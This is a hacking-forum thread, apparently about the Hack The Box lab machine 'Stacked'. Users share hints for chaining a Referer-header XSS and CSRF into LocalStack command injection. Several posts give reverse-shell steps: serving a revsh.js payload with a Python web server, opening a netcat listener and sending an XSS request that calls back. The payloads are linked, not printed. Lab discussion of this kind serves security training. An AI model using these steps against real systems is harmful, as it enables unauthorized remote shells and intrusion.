TUTORIAL HTB Stacked [Discussion]
by pheonix2021 - September 18, 2021 at 06:09 PM
#37
(September 24, 2021 at 12:53 PM)GSSidda7 Wrote:
(September 24, 2021 at 12:38 PM)crux12 Wrote:
(September 24, 2021 at 06:55 AM)infosecsy18 Wrote: Any hint for the root part

Stucked there too........

hint on XSS to OS Command Injc..?

You should give a try to the CSRF; try to chain it
Reply
#38
(September 24, 2021 at 12:53 PM)GSSidda7 Wrote:
(September 24, 2021 at 12:38 PM)crux12 Wrote:
(September 24, 2021 at 06:55 AM)infosecsy18 Wrote: Any hint for the root part

Stucked there too........

hint on XSS to OS Command Injc..?

stuck on privesc to root too on localstack

for the user, the mentioned sonarsource blog post and the injection on the Referer are enough. 
use the Referer XSS injection to inject a controlled js file that can redirect the user to the dashboard.  
the bot runs every 2 mins
Reply
#39
(September 23, 2021 at 08:15 PM)GSSidda7 Wrote:
(September 23, 2021 at 07:34 PM)infosecsy18 Wrote:
(September 23, 2021 at 06:54 PM)GSSidda7 Wrote:
(September 23, 2021 at 05:53 PM)infosecsy18 Wrote: anyone can help me to use this exploit
https://blog.sonarsource.com/hack-the-st...localstack
How to pass parameter  to /dashboard/api/

Does /dashboard/api work?


you can access to dashboard using xss because the port of "Online Interpreter" is locally

XSS through portfolio subdomain and through mail subdomain??? If Yes the XSS payload Plz

create revsh.js 
(set IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/A8kwZOzB#+YmSmfAy...0m5wHozl+y

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (set IP)
https://0bin.net/paste/sJvuXybM#4IhYs1Ak...SMimmnwsGO

and wait for the incoming GET request to http.server and nc connection from the container.
Reply
#40
(September 25, 2021 at 11:26 AM)TDis7 Wrote:
(September 23, 2021 at 08:15 PM)GSSidda7 Wrote:
(September 23, 2021 at 07:34 PM)infosecsy18 Wrote:
(September 23, 2021 at 06:54 PM)GSSidda7 Wrote:
(September 23, 2021 at 05:53 PM)infosecsy18 Wrote: anyone can help me to use this exploit
https://blog.sonarsource.com/hack-the-st...localstack
How to pass parameter  to /dashboard/api/

Does /dashboard/api work?


you can access to dashboard using xss because the port of "Online Interpreter" is locally

XSS through portfolio subdomain and through mail subdomain??? If Yes the XSS payload Plz

Hi,

create revsh.js 
(change IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/eZz31QqL#0btmdV38...DZzGH7FFQM

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (change IP to your VM!)
https://0bin.net/paste/+C+bHP2c#UIPPgxFZ...m+aYiM+tjI

and wait for the incoming GET request to http.server and nc connection from the container.
Any hints on root?
Reply
#41
(September 25, 2021 at 11:26 AM)TDis7 Wrote:
(September 23, 2021 at 08:15 PM)GSSidda7 Wrote:
(September 23, 2021 at 07:34 PM)infosecsy18 Wrote:
(September 23, 2021 at 06:54 PM)GSSidda7 Wrote:
(September 23, 2021 at 05:53 PM)infosecsy18 Wrote: anyone can help me to use this exploit
https://blog.sonarsource.com/hack-the-st...localstack
How to pass parameter  to /dashboard/api/

Does /dashboard/api work?


you can access to dashboard using xss because the port of "Online Interpreter" is locally

XSS through portfolio subdomain and through mail subdomain??? If Yes the XSS payload Plz

create revsh.js 
(change IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/eZz31QqL#0btmdV38...DZzGH7FFQM

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (change IP to your VM!)
https://0bin.net/paste/+C+bHP2c#UIPPgxFZ...m+aYiM+tjI

and wait for the incoming GET request to http.server and nc connection from the container.

Can you post that revshell.js again? 

Can't workout how to get the callback from /dashboard/api/
Reply
#42
maybe that
SQLALCHEMY_DATABASE_URI = 'mysql://bolt_dba:[email protected]/boltmail'
---
but not dump
mysqldump: Error: 'Access denied; you need (at least one of) the PROCESS privilege(s) for this operation' when trying to dump tablespaces
and bad try mysql-shell
---
so that is not interesting, only hash admin in one table user
---
sorry not this thread
Reply
#43
(September 26, 2021 at 09:45 PM)TDis7 Wrote:
(September 26, 2021 at 03:49 PM)Wubbadubdub Wrote:
(September 25, 2021 at 11:26 AM)TDis7 Wrote:
(September 23, 2021 at 08:15 PM)GSSidda7 Wrote:
(September 23, 2021 at 07:34 PM)infosecsy18 Wrote: you can access to dashboard using xss because the port of "Online Interpreter" is locally

XSS through portfolio subdomain and through mail subdomain??? If Yes the XSS payload Plz

create revsh.js 
(change IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/eZz31QqL#0btmdV38...DZzGH7FFQM

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (change IP to your VM!)
https://0bin.net/paste/+C+bHP2c#UIPPgxFZ...m+aYiM+tjI

and wait for the incoming GET request to http.server and nc connection from the container.

Can you post that revshell.js again? 

Can't workout how to get the callback from /dashboard/api/

https://0bin.net/paste/DrXy8Bt1#5kjSap7shQERQ-uxQ9pzhpayfj85mMWTW3r4W1qLRYj
it works, just change IP in the URL encoded string...

How did you find those headers?
and also those env variables
Reply
#44
I stuck in the last 3 days on root
plz if you know anything give me hint :-(
Reply
#45
(September 27, 2021 at 10:57 AM)A_matin12 Wrote:
(September 26, 2021 at 09:45 PM)TDis7 Wrote:
(September 26, 2021 at 03:49 PM)Wubbadubdub Wrote:
(September 25, 2021 at 11:26 AM)TDis7 Wrote:
(September 23, 2021 at 08:15 PM)GSSidda7 Wrote: XSS through portfolio subdomain and through mail subdomain??? If Yes the XSS payload Plz

create revsh.js 
(change IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/eZz31QqL#0btmdV38...DZzGH7FFQM

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (change IP to your VM!)
https://0bin.net/paste/+C+bHP2c#UIPPgxFZ...m+aYiM+tjI

and wait for the incoming GET request to http.server and nc connection from the container.

Can you post that revshell.js again? 

Can't workout how to get the callback from /dashboard/api/

https://0bin.net/paste/DrXy8Bt1#5kjSap7shQERQ-uxQ9pzhpayfj85mMWTW3r4W1qLRYj
it works, just change IP in the URL encoded string...

How did you find those headers?
and also those env variables

by running the container locally & BURP & https://reqbin.com/
Reply
#46
(September 27, 2021 at 08:31 PM)TDis7 Wrote:
(September 27, 2021 at 10:57 AM)A_matin12 Wrote:
(September 26, 2021 at 09:45 PM)TDis7 Wrote:
(September 26, 2021 at 03:49 PM)Wubbadubdub Wrote:
(September 25, 2021 at 11:26 AM)TDis7 Wrote: create revsh.js 
(change IP to your VM in URL encoded string - var URL)
https://0bin.net/paste/eZz31QqL#0btmdV38...DZzGH7FFQM

python3 -m http.server 80
and
nc -nvlp 1234

send a request containing XSS (change IP to your VM!)
https://0bin.net/paste/+C+bHP2c#UIPPgxFZ...m+aYiM+tjI

and wait for the incoming GET request to http.server and nc connection from the container.

Can you post that revshell.js again? 

Can't workout how to get the callback from /dashboard/api/

https://0bin.net/paste/DrXy8Bt1#5kjSap7shQERQ-uxQ9pzhpayfj85mMWTW3r4W1qLRYj
it works, just change IP in the URL encoded string...

How did you find those headers?
and also those env variables

by running the container locally & BURP & https://reqbin.com/

Thanks!!
Reply
#47
Anyone with root? Stuck at user localstack
Reply
#48
can someone share js script for reverse shell, the link is dead
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB Fingerprint [Discussion] TDis7 26 1,602 33 minutes ago
Last Post: harry123
TUTORIAL HTB Hancliffe [Discussion] pheonix2021 130 30,412 1 hour ago
Last Post: hacker00
TUTORIAL HTB Anubis Discussion dadamnmayne 167 55,753 3 hours ago
Last Post: xvelasco

 Users browsing this thread: 1 Guest(s)